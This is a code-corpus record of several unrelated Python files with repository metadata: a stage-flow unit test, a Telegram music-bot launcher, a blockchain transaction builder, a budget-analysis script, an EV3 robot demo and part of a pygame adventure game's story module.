TheCheapestPixels/panda3d-stageflow
|
7a049d939dec39e3ac780872bbaba5c25f309397
|
[
"BSD-3-Clause"
] | 2
|
2020-05-28T03:33:47.000Z
|
2020-05-28T03:38:30.000Z
|
tests/test_core.py
|
TheCheapestPixels/panda3d-stageflow
|
7a049d939dec39e3ac780872bbaba5c25f309397
|
[
"BSD-3-Clause"
] | null | null | null |
from stageflow import Flow
from stageflow import Stage
def test_create_stage():
Stage()
def test_create_flow_bare():
flow = Flow()
assert flow.get_current_stage() is None
assert set(flow.get_stages()) == set([])
def test_create_flow_and_add_stage():
flow = Flow()
flow.add_stage('test', Stage())
assert flow.get_current_stage() is None
assert set(flow.get_stages()) == set(['test'])
def test_create_flow_with_stage():
flow = Flow(stages=dict(test=Stage()))
assert flow.get_current_stage() is None
assert set(flow.get_stages()) == set(['test'])
def test_create_flow_with_initial_stage():
class TestStage():
def enter(self, data):
pass
def exit(self):
pass
flow = Flow(
stages=dict(test=TestStage()),
initial_stage='test',
)
assert flow.get_current_stage() is 'test'
assert set(flow.get_stages()) == set(['test'])
def test_transition_entry():
test_data = 'foo'
global passed_data
passed_data = None
class TestStage(Stage):
def enter(self, data):
global passed_data
passed_data = data
flow = Flow(
stages=dict(test=TestStage()),
initial_stage='test',
initial_stage_data=test_data,
)
assert passed_data == test_data
assert flow.get_current_stage() == 'test'
def test_transition_entry():
global has_exited
has_exited = False
exit_data = 'foo_bar_baz'
global entry_data
entry_data = None
class TestStage(Stage):
def enter(self, data):
global entry_data
entry_data = data
def exit(self, data):
global has_exited
has_exited = True
return exit_data
flow = Flow(
stages=dict(
test_a=TestStage(),
test_b=TestStage(),
),
initial_stage='test_a',
)
assert flow.get_current_stage() == 'test_a'
assert entry_data is None
assert not has_exited
flow.transition('test_b')
assert flow.get_current_stage() == 'test_b'
assert entry_data == exit_data
assert has_exited
def test_pushing_substage():
global entry_data
entry_data = None
global exit_data
exit_data = None
class TestStage(Stage):
def enter(self, data):
global entry_data
entry_data = 'stage'
def exit(self, data):
global exit_data
exit_data = 'stage'
def exit_to_substage(self, substage, data):
global exit_data
exit_data = 'stage'
def reenter_from_substage(self, substage, data):
global entry_data
entry_data = 'stage'
class TestSubstage(Stage):
def enter(self, data):
global entry_data
entry_data = 'substage'
def exit(self, data):
global exit_data
exit_data = 'substage'
def exit_to_substage(self, data):
global exit_data
exit_data = 'substage'
def reenter_from_substage(self, substage, data):
global entry_data
entry_data = 'substage'
flow = Flow(
stages=dict(test=TestStage()),
substages=dict(test_substage=TestSubstage()),
initial_stage='test',
)
assert exit_data is None
assert entry_data == 'stage'
assert flow.get_current_substage() is None
flow.push_substage('test_substage')
assert exit_data == 'stage'
assert entry_data == 'substage'
assert flow.get_current_substage() == 'test_substage'
flow.pop_substage()
assert exit_data == 'substage'
assert entry_data == 'stage'
assert flow.get_current_substage() is None
# FIXME: Now add the ways that Flow *shouldn't* be usable:
# * transitioning to non-existent stages
# * passing invalid objects to Flow(stages=...)
| 24.36875
| 58
| 0.616055
| 1,344
| 0.344704
| 0
| 0
| 0
| 0
| 0
| 0
| 388
| 0.099513
|
b1a639ae9556a6f333b9ef26546b354a0f37d7a5
| 1,925
|
py
|
Python
|
Yukki/__main__.py
|
nezukorobot/YUUKI
|
7589acbb7db1e52710ee9fce1bdc6df5cb924be6
|
[
"MIT"
] | null | null | null |
Yukki/__main__.py
|
nezukorobot/YUUKI
|
7589acbb7db1e52710ee9fce1bdc6df5cb924be6
|
[
"MIT"
] | null | null | null |
Yukki/__main__.py
|
nezukorobot/YUUKI
|
7589acbb7db1e52710ee9fce1bdc6df5cb924be6
|
[
"MIT"
] | 1
|
2021-12-01T10:17:55.000Z
|
2021-12-01T10:17:55.000Z
|
import asyncio
import time
import uvloop
import importlib
from pyrogram import Client as Bot, idle
from .config import API_ID, API_HASH, BOT_TOKEN, MONGO_DB_URI, SUDO_USERS, LOG_GROUP_ID
from Yukki import BOT_NAME, ASSNAME, app, chacha, aiohttpsession
from Yukki.YukkiUtilities.database.functions import clean_restart_stage
from Yukki.YukkiUtilities.database.queue import (get_active_chats, remove_active_chat)
from .YukkiUtilities.tgcallsrun import run
from pyrogram import Client, idle
from motor.motor_asyncio import AsyncIOMotorClient as MongoClient
import time
Bot(
':yukki:',
API_ID,
API_HASH,
bot_token=BOT_TOKEN,
plugins={'root': 'Yukki.Plugins'},
).start()
print(f"[INFO]: BOT STARTED AS {BOT_NAME}!")
print(f"[INFO]: ASSISTANT STARTED AS {ASSNAME}!")
async def load_start():
restart_data = await clean_restart_stage()
if restart_data:
print("[INFO]: SENDING RESTART STATUS")
try:
await app.edit_message_text(
restart_data["chat_id"],
restart_data["message_id"],
"**Restarted the Bot Successfully.**",
)
except Exception:
pass
served_chats = []
try:
chats = await get_active_chats()
for chat in chats:
served_chats.append(int(chat["chat_id"]))
except Exception as e:
print("Error came while clearing db")
for served_chat in served_chats:
try:
await remove_active_chat(served_chat)
except Exception as e:
print("Error came while clearing db")
pass
await app.send_message(LOG_GROUP_ID, "Bot Started")
await chacha.send_message(LOG_GROUP_ID, "Assistant Started")
print("[INFO]: STARTED")
loop = asyncio.get_event_loop()
loop.run_until_complete(load_start())
run()
loop.close()
print("[LOG] CLOSING BOT")
| 29.166667
| 90
| 0.662338
| 0
| 0
| 0
| 0
| 0
| 0
| 1,010
| 0.524675
| 336
| 0.174545
|
b1a71b362a63e180bb73d60affe130cb3f02f9e9
| 3,180
|
py
|
Python
|
loopchain/blockchain/transactions/transaction_builder.py
|
metalg0su/loopchain
|
dd27f8f42a350d1b22b0985749b1e821c053fe49
|
[
"Apache-2.0"
] | null | null | null |
loopchain/blockchain/transactions/transaction_builder.py
|
metalg0su/loopchain
|
dd27f8f42a350d1b22b0985749b1e821c053fe49
|
[
"Apache-2.0"
] | 7
|
2019-08-28T00:19:28.000Z
|
2020-07-31T07:07:53.000Z
|
loopchain/blockchain/transactions/transaction_builder.py
|
metalg0su/loopchain
|
dd27f8f42a350d1b22b0985749b1e821c053fe49
|
[
"Apache-2.0"
] | null | null | null |
import hashlib
from abc import abstractmethod, ABC
from typing import TYPE_CHECKING
from .. import Signature, ExternalAddress, Hash32
from loopchain.crypto.hashing import build_hash_generator
if TYPE_CHECKING:
from secp256k1 import PrivateKey
from . import Transaction, TransactionVersioner
class TransactionBuilder(ABC):
_hash_salt = None
def __init__(self, hash_generator_version: int):
self._hash_generator = build_hash_generator(hash_generator_version, self._hash_salt)
# Attributes that must be assigned
self.private_key: 'PrivateKey' = None
# Attributes to be generated
self.from_address: 'ExternalAddress' = None
self.hash: 'Hash32' = None
self.signature: 'Signature' = None
self.origin_data: dict = None
self.raw_data: dict = None
def reset_cache(self):
self.from_address = None
self.hash = None
self.signature = None
self.origin_data = None
self.raw_data = None
@abstractmethod
def build(self) -> 'Transaction':
raise NotImplementedError
def build_hash(self):
if self.origin_data is None:
raise RuntimeError(f"origin data is required. Run build_origin_data.")
self.hash = self._build_hash()
return self.hash
def _build_hash(self):
return Hash32(self._hash_generator.generate_hash(self.origin_data))
def build_from_address(self):
if self.private_key is None:
raise RuntimeError(f"private_key is required.")
self.from_address = self._build_from_address()
return self.from_address
def _build_from_address(self):
serialized_pub = self.private_key.pubkey.serialize(compressed=False)
hashed_pub = hashlib.sha3_256(serialized_pub[1:]).digest()
return ExternalAddress(hashed_pub[-20:])
@abstractmethod
def build_raw_data(self) -> dict:
pass
@abstractmethod
def build_origin_data(self) -> dict:
pass
def sign(self):
if self.hash is None:
self.build_hash()
self.signature = self._sign()
return self.signature
def _sign(self):
raw_sig = self.private_key.ecdsa_sign_recoverable(msg=self.hash,
raw=True,
digest=hashlib.sha3_256)
serialized_sig, recover_id = self.private_key.ecdsa_recoverable_serialize(raw_sig)
signature = serialized_sig + bytes((recover_id, ))
return Signature(signature)
@classmethod
def new(cls, version: str, versioner: 'TransactionVersioner'):
from . import genesis, v2, v3
hash_generator_version = versioner.get_hash_generator_version(version)
if version == genesis.version:
return genesis.TransactionBuilder(hash_generator_version)
elif version == v2.version:
return v2.TransactionBuilder(hash_generator_version)
elif version == v3.version:
return v3.TransactionBuilder(hash_generator_version)
raise RuntimeError(f"Not supported tx version({version})")
| 32.783505
| 92
| 0.659119
| 2,876
| 0.904403
| 0
| 0
| 797
| 0.250629
| 0
| 0
| 260
| 0.081761
|
b1a7a9bcfc93410c2986fe9c347507c8fbff9db4
| 1,132
|
py
|
Python
|
PyBank/main.py
|
yongjinjiang/python-challenge
|
4b266976baf8339186fae7140024ae5a3af3bc76
|
[
"ADSL"
] | null | null | null |
PyBank/main.py
|
yongjinjiang/python-challenge
|
4b266976baf8339186fae7140024ae5a3af3bc76
|
[
"ADSL"
] | null | null | null |
PyBank/main.py
|
yongjinjiang/python-challenge
|
4b266976baf8339186fae7140024ae5a3af3bc76
|
[
"ADSL"
] | null | null | null |
import csv
import os
resource_dir="/Users/jyj/OneDrive/A_A_Data_Analysis/MINSTP201808DATA2/03-Python/Homework/PyBank/Resources"
file_path=os.path.join(resource_dir,"budget_data.csv")
with open(file_path,newline="") as data_file:
csvreader=csv.reader(data_file,delimiter=",")
next(csvreader)
i=0
Num_month=0
Pro_each_month=[]
months=[]
for row in csvreader:
#print(row)
months.append(row[0])
Pro_each_month.append(float(row[1]))
# if i==5:
# break
# i=i+1
Num_month=Num_month+1
print("Financial Analysis")
print("____________________")
print("Total Months:{}".format(Num_month))
print("Total:${}".format(sum(Pro_each_month)))
ss1=Pro_each_month[:-1]
ss2=Pro_each_month[1:]
ss=[ss2[i]-ss1[i] for i in range(Num_month-1)]
print("Average change:${}".format(sum(ss)/(Num_month-1)))
print("Greatest increase in Profits :{} (${})".format(months[ss.index(max(ss))+1],max(ss)))
print("Greatest Decrease in Profits :{} (${})".format(months[ss.index(min(ss))+1],min(ss)))
| 31.444444
| 106
| 0.626325
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 327
| 0.288869
|
b1a801667f7526e28011c5f08b7558d194b2a413
| 3,508
|
py
|
Python
|
demo.py
|
sshopov/pyconau2017
|
e492e284a5afa5115f81fddf83546168b128591c
|
[
"MIT"
] | 21
|
2018-01-09T15:55:44.000Z
|
2020-03-22T06:27:52.000Z
|
demo.py
|
sshopov/pyconau2017
|
e492e284a5afa5115f81fddf83546168b128591c
|
[
"MIT"
] | null | null | null |
demo.py
|
sshopov/pyconau2017
|
e492e284a5afa5115f81fddf83546168b128591c
|
[
"MIT"
] | 9
|
2017-08-08T10:19:09.000Z
|
2019-03-01T12:12:30.000Z
|
#!/usr/bin/env python3
'''
Source name: demo.py
Author(s): Stoyan Shopov
Python Version: 3.* 32-bit or 64-bit
License: LGPL
Description:
This program was demoed on EV3D4 at PyCon Australia 2017.
It kicks off 2 threads a move thread and a feel thread.
The move thread drives the bot forward until the feel thread
detects an obstacle.
Then the move thread makes the bot move around in a circle
until the feel thread detects a touch on the touch sensor.
Preconditions:
The program has been loaded on to EV3 running ev3dev
Postcoditions:
Program exits cleanly.
References:
https://github.com/sshopov/pyconau2017
https://github.com/rhempel/ev3dev-lang-python
Release history:
----------------------------------------------------
0.0.1 - 06/08/2017:
Initial release
'''
import sys
import time
import threading
import signal
from ev3dev import ev3
def move(done):
lm = ev3.LargeMotor('outB'); assert lm.connected
rm = ev3.LargeMotor('outC'); assert rm.connected
cl = ev3.ColorSensor(); assert cl.connected
cl.mode='COL-AMBIENT'
speed = 250 #cl.value()
lm.run_forever(speed_sp=speed)
rm.run_forever(speed_sp=speed)
while not done.is_set():
time.sleep(1)
#stop both motors
lm.stop(stop_action='brake')
rm.stop(stop_action='brake')
lm.wait_while('running')
rm.wait_while('running')
#run around in a circle
done.clear()
lm.run_forever(speed_sp=speed)
while not done.is_set():
time.sleep(1)
lm.stop(stop_action='brake')
lm.wait_while('running')
def feel(done):
ir = ev3.InfraredSensor(); assert ir.connected
ts = ev3.TouchSensor(); assert ts.connected
screen = ev3.Screen()
sound = ev3.Sound()
screen.draw.text((60,40), 'Going for a walk')
screen.update()
while ir.proximity > 30:
if done.is_set():
break
time.sleep(0.1)
done.set() #this will set it running in a circle
ev3.Leds.set_color(ev3.Leds.LEFT, ev3.Leds.RED)
ev3.Leds.set_color(ev3.Leds.RIGHT, ev3.Leds.RED)
screen.clear()
screen.draw.text((60,20), 'There is something is front of me')
screen.update()
while not ts.is_pressed:
sound.speak("Where should I go next?").wait()
time.sleep(0.5)
done.set() #will stop the circle dance
# The 'done' event will be used to signal the threads to stop:
done = threading.Event()
# We also need to catch SIGINT (keyboard interrup) and SIGTERM (termination
# signal from brickman) and exit gracefully:
def signal_handler(signal, frame):
done.set()
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
# Now that we have the worker functions defined, lets run those in separate
# threads.
move_thread = threading.Thread(target=move, args=(done,))
feel_thread = threading.Thread(target=feel, args=(done,))
move_thread.start()
feel_thread.start()
# The main thread will wait for the 'back' button to be pressed. When that
# happens, it will signal the worker threads to stop and wait for their completion.
btn = ev3.Button()
while not btn.backspace and not done.is_set():
time.sleep(1)
done.set()
move_thread.join()
feel_thread.join()
ev3.Sound.speak('Farewell and good bye!').wait()
ev3.Leds.all_off()
| 26.37594
| 84
| 0.643672
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,579
| 0.450114
|
b1a8412c74612f899302b6781aec760fcfd3dd6d
| 21,742
|
py
|
Python
|
Game/story.py
|
starc52/GDE-Project
|
50ee4055e26c1873b1c21dcb2a8c2d05f7bca40f
|
[
"MIT"
] | null | null | null |
Game/story.py
|
starc52/GDE-Project
|
50ee4055e26c1873b1c21dcb2a8c2d05f7bca40f
|
[
"MIT"
] | null | null | null |
Game/story.py
|
starc52/GDE-Project
|
50ee4055e26c1873b1c21dcb2a8c2d05f7bca40f
|
[
"MIT"
] | 1
|
2021-07-06T03:38:24.000Z
|
2021-07-06T03:38:24.000Z
|
from Game.player import Player
from pygame import *
from Game.const import *
class Story:
""" Story line class """
def __init__(self, message, treasure, player, screen, fade, maps, sound):
self.screen = screen
self.message = message
self.treasure = treasure
self.player = player
self.fade = fade
self.maps = maps
self.sound = sound
# just for testing remove later
self.treasure.collectedItems.add(self.treasure.items['boat'][0])
self.selectedFirstLocation="rochelle"
self.mainWorldMsgFinished = False
self.gotWorldMap = False
self.BurntHouseMsgFinished = False
self.LabHouseMsgFinished = False
self.islandMsgFinished = False
self.passwordMsgFinished=False
self.shipCorridorMsgFinished = False
self.shipCabinMsgFinished = False
# Flag to see if game is over (player won)
self.gameWon = False
self.letter1 = transform.scale(image.load("resources/graphics/items/letter1_preview_rev_1.png"),(70,70))
self.letter2 = transform.scale(image.load("resources/graphics/items/letter1_preview_rev_1.png"),(70,70))
self.brochure = transform.scale(image.load("resources/graphics/items/brochure.png"),(80,80))
self.worldMap = transform.scale(image.load("resources/graphics/map/null.png"),(70,70))
self.key = transform.scale(image.load("resources/graphics/items/key.png"),(70,70))
self.laptop = transform.scale(image.load("resources/graphics/items/laptop.png"),(160,130))
self.testtube = transform.scale(image.load("resources/graphics/items/testtube.png"),(70,70))
self.microscope = transform.scale(image.load("resources/graphics/items/microscope.png"),(70,70))
self.chestbox = transform.scale(image.load("resources/graphics/items/chest.png"),(70,70))
# List of all available items (name -> description -> position -> cost -> rect)
self.healthPotion = transform.scale(image.load("resources/graphics/items/healthPotion.png"), (70,70))
# List of all available items (name -> description -> position -> cost -> rect)
self.availableItems = {
# "speedBoots" : [["These are the boots of Hermes.", "Legend says they increase your speed."], (156,135), 30, Rect(153,133,70,70)],
# "earthGem" : [["Some sort of shining gem.", "It seems useless..."], (876,270), 200, Rect(864,262,self.earthGemImage.get_width()*2,self.earthGemImage.get_height()*2)],
"healthPotion" : [["Potion to increase your health by 20."], (509,419), 50, Rect(509,419,70,70)],
# "newPrayer" : [["New prayer to use at the church.", "You have %s prayers."%str(self.prayers)], (132,336), 100, Rect(132,336,100,100)],
"brochure" : [[""], (876,270), 200, Rect(865,270,70,70)],
"letter1" : [["Dr.Gwen says to Dr.Nevlin, ' I fear the zombie virus is far", "deadlier than we ever imagined. I have many unconfirmed reports , but", "there is no point spreading panic.'"], (676,250), 200, Rect(664,242,100,100)],
"letter2" : [["You pick up Dr. Nevlin�s letter. 'Hope you are safe in the bunker.I ", "am working on the cure in our lab in Teshlor. I'm close.. The rest", "of it is gibberish - NEVLIN written repeatedly."],(132,336), 100, Rect(132,336,100,100)],
"worldMap" : [[""],(240,400), 100, Rect(240,400,70,70)],
"key" : [[""], (429,339), 30, Rect(429,339,70,70)],
"laptop" : [[""], (825,185), 200, Rect(825,185,100,100)],
"testtube" : [[""], (123.5,464), 200, Rect(123.5,464,70,70)],
"microscope" : [[""], (40.5,410), 200, Rect(40.5,410,70,70)],
"chestbox" : [["treasure box."], (541,46), 200, Rect(530,35,80,80)]
}
# Reuturn rect
self.shopReturn = Rect(833,508,300,300)
# -----------------------------------
# Keyboard actions
self.spaceReady = False
self.returnReady = False
self.pReady = False
def intro(self, next):
""" Introduction """
# Only do the narration scene once
if not self.mainWorldMsgFinished:
self.message.narration(["Clearly, this hideout has been deserted for quite some time.",\
"Who was hiding.. And from what?",\
], next, "top")
if self.message.done:
self.mainWorldMsgFinished = True
if not mac:
mixer.music.fadeout(500)
mixer.music.load(self.sound.getMusic("mainWorldTheme"))
mixer.music.play(loops=-1)
self.message.reset()
def hideout(self, click):
""" Main hideout """
pos = mouse.get_pos()
def msg(text):
""" Render message """
self.screen.blit(transform.scale(self.message.background, (600,200)), (229,30))
self.screen.blit(self.message.font.render(text, True, (0,0,0)), (255,49))
self.treasure.render(True, False, False, False, self.message)
# Render and pause
display.flip()
time.wait(1500)
# Blit background
self.screen.blit(transform.scale(self.message.background, (600,200)), (229,30))
# Loop through the dictionary and draw the items
for key,val in self.availableItems.items():
if key == "letter1":
# Animate gem shine
self.screen.blit(self.letter1, val[1])
if key == "letter2":
# Animate gem shine
self.screen.blit(self.letter2, val[1])
# General description
# Loop through items
for item in [
["letter1", Rect(864,262,self.letter1.get_width()*2,self.letter1.get_height()*2)],
["letter2", Rect(864,262,self.letter2.get_width()*2,self.letter2.get_height()*2)]
]:
if not item[1].collidepoint(pos):
self.screen.blit(transform.scale(self.message.background, (600,200)), (229,30))
self.screen.blit(self.message.font.render("Hover over an item to view its description.", True, (0,0,0)), (245,40))
self.screen.blit(self.message.font.render("Click on it to collect it.", True, (0,0,0)), (245,90))
else:
if not item[0] in self.availableItems:
self.screen.blit(transform.scale(self.message.background, (600,200)), (229,30))
self.screen.blit(self.message.font.render("Hover over item for its description.", True, (0,0,0)), (245,40))
self.screen.blit(self.message.font.render("Click on it to collect it.", True, (0,0,0)), (245,90))
if "letter1" in self.availableItems:
if self.availableItems["letter1"][3].collidepoint(pos):
self.screen.blit(transform.scale(self.message.background, (600,200)), (229,30))
self.screen.blit(self.message.font.render(self.availableItems["letter1"][0][0], True, (0,0,0)), (245,40))
self.screen.blit(self.message.font.render(self.availableItems["letter1"][0][1], True, (0,0,0)), (245,90))
self.screen.blit(self.message.font.render(self.availableItems["letter1"][0][2], True, (0,0,0)), (245,140))
#self.screen.blit(self.message.font.render("$ %s"%str(self.availableItems["brochure"][2]), True, (255,255,255)), (515,532))
if click:
# Add item to inventory
self.treasure.collectedItems.add("letter1")
# Increase the player speed in all maps
# Remove item from dictionary
self.availableItems.pop("letter1", None)
if "letter2" in self.availableItems:
if self.availableItems["letter2"][3].collidepoint(pos):
self.screen.blit(transform.scale(self.message.background, (600,150)), (229,30))
self.screen.blit(self.message.font.render(self.availableItems["letter2"][0][0], True, (0,0,0)), (245,40))
self.screen.blit(self.message.font.render(self.availableItems["letter2"][0][1], True, (0,0,0)), (245,90))
self.screen.blit(self.message.font.render(self.availableItems["letter2"][0][2], True, (0,0,0)), (245,140))
#self.screen.blit(self.message.font.render("$ %s"%str(self.availableItems["brochure"][2]), True, (255,255,255)), (515,532))
if click:
# Add item to inventory
self.treasure.collectedItems.add("letter2")
# Increase the player speed in all maps
# Remove item from dictionary
self.availableItems.pop("letter2", None)
if self.shopReturn.collidepoint(pos) and click:
# Fade into main world
self.fade.fadeDark(self.maps.allScenes["mainWorld"][0], self.screen, self.player.mapCoords["mainWorld"])
# Create new scene
self.maps.newScene("mainWorld")
# Set player coordinates
self.player.x = self.player.mapx+9311
self.player.y = self.player.mapy+2168
# Reset fade
self.fade.reset()
# Change music
if not mac:
mixer.music.fadeout(500)
mixer.music.load(self.sound.getMusic("mainWorldTheme"))
mixer.music.play(loops=-1)
def shipCorridor(self, next):
""" Main surprise temple """
#pos = mouse.get_pos()
def msg(text, length):
""" Render message """
self.screen.blit(transform.scale(self.message.background, (600,150)), (259,30))
self.screen.blit(self.message.font.render(text, True, (0,0,0)), (275,59))
self.treasure.render(True, False, False, False, self.message)
# Render and pause
display.flip()
time.wait(length)
# Only do the narration scene once
if not self.shipCorridorMsgFinished:
self.message.narration(["You want answers and the only way to get them is get up and explore."], next, "top")
if self.message.done:
self.shipCorridorMsgFinished = True
self.message.reset()
for key,val in self.availableItems.items():
if key == "brochure":
self.screen.blit(self.brochure, val[1])
break
pos=[self.player.x,self.player.y]
#pos=(x,y)
# Speed boots
if "brochure" in self.availableItems:
if self.availableItems["brochure"][3].collidepoint(pos):
# Word wrap text
self.screen.blit(transform.scale(self.message.background, (600,150)), (259,30))
self.screen.blit(self.message.font.render(self.availableItems["brochure"][0][0], True, (0,0,0)), (275,59))
self.treasure.collectedItems.add("brochure")
self.availableItems.pop("brochure", None)
# Notification
msg("It's a brochure about some ship... The Black Pearl!", 3000)
msg("Someone has scrawled, �CELL HERO� on it.", 3000)
msg("Is it a hint?", 3000)
def shipCabin(self, next):
""" Main surprise temple """
mousePos = mouse.get_pos()
def msg(text, length):
""" Render message """
self.screen.blit(transform.scale(self.message.background, (600,150)), (259,30))
self.screen.blit(self.message.font.render(text, True, (0,0,0)), (275,59))
self.treasure.render(True, False, False, False, self.message)
# Render and pause
display.flip()
time.wait(length)
if not self.shipCabinMsgFinished:
self.message.narration(["Looks like a control room of sorts"], next, "top")
if self.message.done:
self.shipCabinMsgFinished = True
self.message.reset()
for key,val in self.availableItems.items():
if key == "worldMap":
self.screen.blit(self.worldMap, val[1])
pos=[self.player.x,self.player.y]
# Speed boots
if "worldMap" in self.availableItems:
if self.availableItems["worldMap"][3].collidepoint(pos):
# Word wrap text
self.gotWorldMap = True
self.screen.blit(transform.scale(self.message.background, (600,150)), (259,30))
self.screen.blit(self.message.font.render(self.availableItems["worldMap"][0][0], True, (0,0,0)), (275,59))
self.treasure.collectedItems.add("worldMap")
self.availableItems.pop("worldMap", None)
# Notification
msg("This is no ordinary map.", 2000)
msg("It�s as though someone has marked on it... just for you.", 3000)
msg("As you read it, it is stored in the hard-disk of your memory.", 3000)
msg("Activate the map by pressing the map button on the right.", 3000)
msg("The ship demands the location of your first stop.", 3000)
msg("What is it?", 2000)
# while(not self.selectedFirstLocation):
# self.selectedFirstLocation=self.message.firstLocationConfirm(click)
# display.flip()
#select first location here
def BurntHouse(self, next):
""" Main surprise temple """
#pos = mouse.get_pos()
def msg(text, length):
""" Render message """
self.screen.blit(transform.scale(self.message.background, (600,150)), (259,30))
self.screen.blit(self.message.font.render(text, True, (0,0,0)), (275,59))
self.treasure.render(True, False, False, False, self.message)
# Render and pause
display.flip()
time.wait(length)
# Only do the narration scene once
if not self.BurntHouseMsgFinished:
self.message.narration(["Acccchhhooo! You start coughing and sneezing as soon as you enter.",
"The smell of burnt wood and ash is too strong.",
"Maybe you will find something useful in the ruins?"
], next, "top")
if self.message.done:
self.BurntHouseMsgFinished = True
self.message.reset()
for key,val in self.availableItems.items():
if key == "key":
self.screen.blit(self.key, val[1])
if key == "laptop":
self.screen.blit(self.laptop, val[1])
pos=[self.player.x,self.player.y]
#pos=(x,y)
# Speed boots
if "key" in self.availableItems:
if self.availableItems["key"][3].collidepoint(pos):
# Word wrap text
self.screen.blit(transform.scale(self.message.background, (600,150)), (259,30))
self.screen.blit(self.message.font.render(self.availableItems["key"][0][0], True, (0,0,0)), (275,59))
self.treasure.collectedItems.add("key")
self.availableItems.pop("key", None)
# Notification
msg("The key is too light for its size (titanium, atomic number 22).", 3000)
msg("It has a striped pattern(barcode signature), you think.", 3000)
msg("Now how did you know that?", 2000)
#print("pos 2 ")
#print(pos)
# Earth gem
if "laptop" in self.availableItems:
if self.availableItems["laptop"][3].collidepoint(pos):
self.screen.blit(transform.scale(self.message.background, (600,150)), (259,30))
self.screen.blit(self.message.font.render(self.availableItems["laptop"][0][0], True, (0,0,0)), (275,59))
self.treasure.collectedItems.add("laptop")
self.availableItems.pop("laptop", None)
# Notification
msg("Your cyborg nature acts instinctively.", 2500)
msg("You retrieve the hard-disk and connect it to your brain.", 3000)
msg("Alas, most sectors are damaged and you see only random noise.", 3000)
msg("A lone grainy video plays.", 2000)
msg("�Frequent zombie attacks o--- coast...�", 2000)
msg("�high infection rate in h--- Aquesta...�, a news reporter is saying.", 3000)
msg("Aquesta. The name triggers something.", 2000)
msg("All around him, there is rubble.", 2500)
msg("People are running and screaming.", 2500)
msg("You just realise you haven�t seen another person in days.", 3000)
msg("Did the zombies kill everyone else ?", 2500)
def Lab(self, next):
""" Main surprise temple """
#pos = mouse.get_pos()
def msg(text, length):
""" Render message """
self.screen.blit(transform.scale(self.message.background, (600,200)), (229,30))
self.screen.blit(self.message.font.render(text, True, (0,0,0)), (245,59))
self.treasure.render(True, False, False, False, self.message)
# Render and pause
display.flip()
time.wait(length)
# Only do the narration scene once
if not self.LabHouseMsgFinished:
self.message.narration(["You have a sense of deja vu. ",
"Yes, you had come here with Dr. Gwen!"
], next, "top")
if self.message.done:
self.LabHouseMsgFinished = True
self.message.reset()
for key,val in self.availableItems.items():
if key == "testtube":
self.screen.blit(self.testtube, val[1])
if key == "microscope":
self.screen.blit(self.microscope, val[1])
pos=[self.player.x,self.player.y]
#pos=(x,y)
# Speed boots
if "testtube" in self.availableItems:
if self.availableItems["testtube"][3].collidepoint(pos):
# Word wrap text
self.screen.blit(transform.scale(self.message.background, (600,150)), (229,30))
self.screen.blit(self.message.font.render(self.availableItems["testtube"][0][0], True, (0,0,0)), (255,59))
#self.screen.blit(self.message.font.render(self.availableItems["key"][0][1], True, (0,0,0)), (275,109))
#self.screen.blit(self.message.font.render("$ %s"%str(self.availableItems["speedBoots"][2]), True, (255,255,255)), (515,532))
self.treasure.collectedItems.add("testtube")
self.availableItems.pop("testtube", None)
# Notification
msg("These test tubes are strangely familiar�", 3000)
msg("You remember now, they are yours!", 3000)
msg("Yes, you used to work here before as a researcher.", 3000)
msg("Your name is Esra Stryker.", 2000)
msg("Dr. Gwen and Dr. Nevlin were your colleagues and best friends.", 3000)
msg("You recall everything right upto your accident. ", 3000)
msg("Aha! Your friends made you a cyborg to save your life. ", 3000)
msg("You must have been on the boat to get better treatment in Rochelle.", 3000)
msg("They left behind the clues in case they didn�t survive.", 3000)
#print("pos 2 ")
#print(pos)
if "microscope" in self.availableItems:
if self.availableItems["microscope"][3].collidepoint(pos):
self.screen.blit(transform.scale(self.message.background, (600,150)), (229,30))
self.screen.blit(self.message.font.render(self.availableItems["microscope"][0][0], True, (0,0,0)), (255,59))
self.treasure.collectedItems.add("microscope")
self.availableItems.pop("microscope", None)
# Notification
msg("You peer through the microscope, observing the virus strains.", 3000)
msg("You created them here.", 2000)
msg("You had a rare gene that made you immune. ", 3000)
msg("There was a mutation in your experiment and... ", 3000)
msg("the zombie virus leaked out. Now everyone is gone.", 2000)
msg("A wave of shame washes over you. ", 2500)
msg("But wait, weren�t you trying to make the cure as well?", 3000)
msg("Where is it? ", 2000)
def dungeon(self, next):
""" Main surprise temple """
#pos = mouse.get_pos()
def msg(text):
""" Render message """
self.screen.blit(transform.scale(self.message.background, (600,150)), (259,30))
self.screen.blit(self.message.font.render(text, True, (0,0,0)), (275,59))
self.treasure.render(True, False, False, False, self.message)
# Render and pause
display.flip()
time.wait(1600)
def finalisland(self, next):
""" Main surprise temple """
#pos = mouse.get_pos()
def msg(text, length):
""" Render message """
self.screen.blit(transform.scale(self.message.background, (600,150)), (259,30))
self.screen.blit(self.message.font.render(text, True, (0,0,0)), (275,59))
self.treasure.render(True, False, False, False, self.message)
# Render and pause
display.flip()
time.wait(length)
if not self.islandMsgFinished:
self.message.narration(["The cure is inside.",
" In order to access it, ",
" you must use the password."
], next,"bottom")
if self.message.done:
self.islandMsgFinished = True
self.message.reset()
for key,val in self.availableItems.items():
if key == "chestbox":
self.screen.blit(self.chestbox, val[1])
pos=[self.player.x,self.player.y]
#pos=(x,y)
# Speed boots
if "chestbox" in self.availableItems:
if self.availableItems["chestbox"][3].collidepoint(pos):
# Word wrap text
self.screen.blit(transform.scale(self.message.background, (600,150)), (259,30))
self.screen.blit(self.message.font.render(self.availableItems["chestbox"][0][0], True, (0,0,0)), (275,59))
self.fade.fadeDark(self.maps.allScenes["islandPassword"][0], self.screen, (0, 0))
# Create new scene
self.maps.newScene("islandPassword")
# Set player coordinates
self.player.x = self.player.mapx+516
self.player.y = self.player.mapy+46
# Reset fade
self.fade.reset()
def islandPassword(self, click, password):
""" Ultimate shop to buy items """
pos = mouse.get_pos()
def msg(text, length):
""" Render message """
self.screen.blit(transform.scale(self.message.background, (600,150)), (259,30))
self.screen.blit(self.message.font.render(text, True, (0,0,0)), (275,59))
self.treasure.render(True, False, False, False, self.message)
# Render and pause
display.flip()
time.wait(length)
# Blit background
# self.screen.blit(transform.scale(self.message.background, (600,150)), (259,30))
keysDict = {
"1": Rect(96, 72, 170, 90),
"2": Rect(315, 72, 170, 90),
"3": Rect(531, 72, 170, 90),
"4": Rect(96, 200, 170, 90),
"5": Rect(315, 200, 170, 90),
